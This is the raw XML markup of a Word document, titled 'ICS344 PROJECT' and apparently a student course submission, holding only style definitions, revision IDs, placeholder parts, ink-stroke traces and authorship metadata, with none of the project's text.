    <w:rsid w:val="0073390A"/>
    <w:rsid w:val="00766CB5"/>
    <w:rsid w:val="007717CA"/>
    <w:rsid w:val="00772B92"/>
    <w:rsid w:val="007F4AA4"/>
    <w:rsid w:val="008042A9"/>
    <w:rsid w:val="00830257"/>
    <w:rsid w:val="00851ED4"/>
    <w:rsid w:val="008B6B3F"/>
    <w:rsid w:val="00A22DFB"/>
    <w:rsid w:val="00AB497B"/>
    <w:rsid w:val="00AD4F03"/>
    <w:rsid w:val="00B20BC2"/>
    <w:rsid w:val="00B41B50"/>
    <w:rsid w:val="00C34D87"/>
    <w:rsid w:val="00CC4DE0"/>
    <w:rsid w:val="00D24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3DE8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5E72CD91-BAE7-43DC-8925-F9692AF7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3F"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="008B6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3F"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="008B6B3F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="008B6B3F"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="008B6B3F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="008B6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3F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="008B6B3F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="007717C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17C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7599">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="379281637">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="379674657">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="494955647">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="719786456">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="735277391">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="910119327">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1143502241">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1322738691">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1440181809">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="150755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1.xml"/><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customXml" Target="ink/ink2.xm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138D6DAE784C71A19EE58649B4BE30"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{2F0D86A6-CA2E-4F74-A2F7-F02BA5F5AFAF}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D73C35" w:rsidRDefault="00D73C35" w:rsidP="00D73C35">
          <w:pPr>
            <w:pStyle w:val="7F138D6DAE784C71A19EE58649B4BE30"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
              <w:caps/>
              <w:color w:val="156082" w:themeColor="accent1"/>
              <w:sz w:val="80"/>
              <w:szCs w:val="80"/>
            </w:rPr>
            <w:t>[Document title]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="2675F55044CA4D108A2D3DA9A8FCB3FB"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{25256D9C-D9D0-40E9-B5F1-7D20E23A4A91}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D73C35" w:rsidRDefault="00D73C35" w:rsidP="00D73C35">
          <w:pPr>
            <w:pStyle w:val="2675F55044CA4D108A2D3DA9A8FCB3F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35"/>
    <w:rsid w:val="00015BD9"/>
    <w:rsid w:val="002A69F3"/>
    <w:rsid w:val="0058188A"/>
    <w:rsid w:val="00830257"/>
    <w:rsid w:val="008E722B"/>
    <w:rsid w:val="00C34D87"/>
    <w:rsid w:val="00D73C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138D6DAE784C71A19EE58649B4BE30">
    <w:name w:val="7F138D6DAE784C71A19EE58649B4BE30"/>
    <w:rsid w:val="00D73C35"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="2675F55044CA4D108A2D3DA9A8FCB3FB">
    <w:name w:val="2675F55044CA4D108A2D3DA9A8FCB3FB"/>
    <w:rsid w:val="00D73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3T17:00:55.442"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">392 1 24575,'-19'0'0,"0"0"0,0 1 0,0 1 0,0 1 0,0 1 0,1 1 0,0 0 0,-33 14 0,38-12 0,-1-2 0,0 0 0,-1 0 0,1-1 0,-1-1 0,-19 2 0,31-5 0,0 1 0,-1-1 0,1 1 0,0 0 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,1 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0 1 0,0 3 0,-2 10 0,1 0 0,1-1 0,0 1 0,3 21 0,-1-16 0,1 5 0,2 0 0,1 0 0,1 0 0,15 41 0,-10-36 0,11 59 0,-21-81 0,1 1 0,1 0 0,0-1 0,0 0 0,1 1 0,0-2 0,10 18 0,-12-23 0,1 0 0,0 0 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 0 0,0-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 0 0,1-1 0,-1 1 0,1-1 0,0 0 0,-1 0 0,9 0 0,4 0 0,0 0 0,0-2 0,0 0 0,29-5 0,-37 4 0,0-1 0,-1 1 0,1-1 0,-1-1 0,0 0 0,0 0 0,0-1 0,-1 1 0,1-2 0,10-9 0,-9 6 69,1 0-1,0 1 0,1 0 0,13-8 1,-17 13-259,0-1 0,-1 2 1,1-1-1,0 1 0,1 0 1,-1 0-1,0 1 1,15-1-1,-7 2-6636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3T17:00:55.443"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">71 0 24575,'11'1'0,"-1"1"0,0 0 0,0 1 0,0 0 0,0 0 0,0 1 0,0 1 0,11 7 0,25 9 0,81 30 0,-122-48 0,0 0 0,0 0 0,0 1 0,0 0 0,-1 0 0,0 0 0,1 0 0,-1 1 0,-1 0 0,1-1 0,-1 2 0,0-1 0,0 0 0,0 0 0,-1 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 9 0,2 12 0,-1 1 0,-2 0 0,-2 30 0,1-47 0,0 48 0,-2 45 0,2-103 0,-1 1 0,1 0 0,0 0 0,-1-1 0,1 1 0,-1 0 0,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1-1 0,0 1 0,1-1 0,-1 1 0,-2 0 0,-6 0 0,0 1 0,-1-2 0,1 1 0,-13-2 0,-14 1 0,6 6 0,1 0 0,0 3 0,-38 14 0,-29 9 0,80-28-1365,3-1-5461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aBDULMAJEED ALGHADMI 202032860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ICS344 PROJECT</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ICS344 PROJECT</dc:title>
  <dc:subject>SECTION 03</dc:subject>
  <dc:creator>ABDULMAJEED SALEM ALGHAMDI</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ABDULAZIZ TARIQ ALTAMIMI</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-03T20:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-03T20:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>